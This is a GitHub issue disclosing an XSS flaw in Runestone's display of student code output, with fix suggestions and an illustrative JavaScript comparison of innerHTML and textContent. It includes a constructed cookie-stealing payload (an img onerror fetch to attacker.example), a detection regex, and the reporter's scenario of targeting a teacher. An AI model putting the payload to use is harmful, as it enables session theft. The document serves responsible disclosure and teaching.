RunestoneInteractive / RunestoneServer

Interactive books for computer science and mathematics
http://runestoneinteractive.org

XSS Bug (Possible Zero-Day Vulnerability) #2035

Closed Endothermic-Dragon closed 1 year ago

Endothermic-Dragon commented 1 year ago

My username on Runestone is "Endothermic-Dragon".

I was doing some Java exercises for my AP CS A class (https://runestone.academy/ns/books/published/HHS-CSA-2022-2023-2/Unit6-Arrays/topic-6-1-array-basics.html), and I noticed that raw HTML was being displayed. This is a sign of possible XSS, so I tried injecting some JavaScript code (""), and it worked without any sort of filter or sanitization.

A possible exploitation of this is to capture a user's cookies by sending them to a web endpoint. My teacher has informed me that she (1) can view and run all of her students' code and (2) checks for code functionality and doesn't read through the code in detail before running it. Using this information, I could theoretically launch an attack against her with a particularly long assignment, where I simply hide this vulnerable code somewhere in there. I could also grab her IP using a similar technique by checking the origin of the request and extrapolate her location. I would have further tested this theory, but have not obtained the consent of my teacher to do so.

If I had to fix this, I would either use DOMPurify to strip any JS or just use "element.innerText" to display the server response rather than "element.innerHTML". If execution is absolutely necessary, I would do this server-side in an appropriately isolated environment.
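The two rendering paths described in the report, as an added illustration that is not Runestone's code: a stand-in element models what a browser does when a server response is assigned to `innerHTML` (parsed as markup) versus `textContent` (stored as text, serialized escaped). The names `makeElement`, `escapeHtml`, `renderUnsafe`, `renderSafe` and `looksLikeActiveContent` are invented for this example, the payload is constructed, and `attacker.example` is a placeholder host; in a real page the stub element would be replaced by `document.getElementById(...)`.

```javascript
// Added example, not code from the Runestone project. Runs under Node
// without a DOM; the element stub below only models innerHTML/textContent.

// Escape the characters that matter in HTML text and attribute contexts.
// This is what textContent does implicitly when the browser serializes
// the element back to markup.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Minimal stand-in for a DOM element (hypothetical helper for this example).
function makeElement() {
  let markup = '';
  let text = '';
  return {
    // Assigning innerHTML hands the string to the HTML parser in a browser,
    // so <script>, <img onerror=...> and similar run. The stub has no parser
    // and just keeps the raw string.
    get innerHTML() { return markup; },
    set innerHTML(v) { markup = String(v); text = String(v); },
    // Assigning textContent stores the string as a text node; reading the
    // element's markup back gives the escaped form, nothing is parsed.
    get textContent() { return text; },
    set textContent(v) { text = String(v); markup = escapeHtml(v); },
  };
}

// VULNERABLE: the server response (for example a student's program output)
// is handed to the HTML parser exactly as the report describes.
function renderUnsafe(el, response) {
  el.innerHTML = response;
  return el.innerHTML; // what the browser would parse and execute
}

// FIXED: the response is displayed as text; markup is shown, not parsed.
function renderSafe(el, response) {
  el.textContent = response;
  return el.innerHTML; // what the browser would serialize: escaped text
}

// Constructed payload: output a student's program could print. The host
// attacker.example is a placeholder; nothing is ever fetched here.
const payload =
  '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Rough check for markup that carries executable content: a <script> tag,
// an on* event-handler attribute inside a tag, or a javascript: URL. This is
// a blocklist used only to show what each path emits; for real sanitizing
// of markup that must stay HTML, an allowlist sanitizer such as DOMPurify
// is the right tool.
function looksLikeActiveContent(markup) {
  return /<script\b|<[a-z][^>]*\son[a-z]+\s*=|javascript:/i.test(markup);
}

function demo() {
  return {
    unsafe: renderUnsafe(makeElement(), payload),
    safe: renderSafe(makeElement(), payload),
    unsafeIsActive: looksLikeActiveContent(renderUnsafe(makeElement(), payload)),
    safeIsActive: looksLikeActiveContent(renderSafe(makeElement(), payload)),
  };
}

console.log(demo());
```

The point of the check is that escaping alone is enough when the response only needs to be read, which covers program output and compiler messages; the `onerror=` text survives in the escaped string but without a `<` the parser never sees a tag, so nothing executes.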

bhoffman0 commented 1 year ago

Yes, you are right. We were aware of this, but no one got around to fixing it. I like your ideas for fixing this! Runestone is open source. Do you want to try fixing it and do a pull request?

github-actions[bot] commented 1 year ago

Stale issue message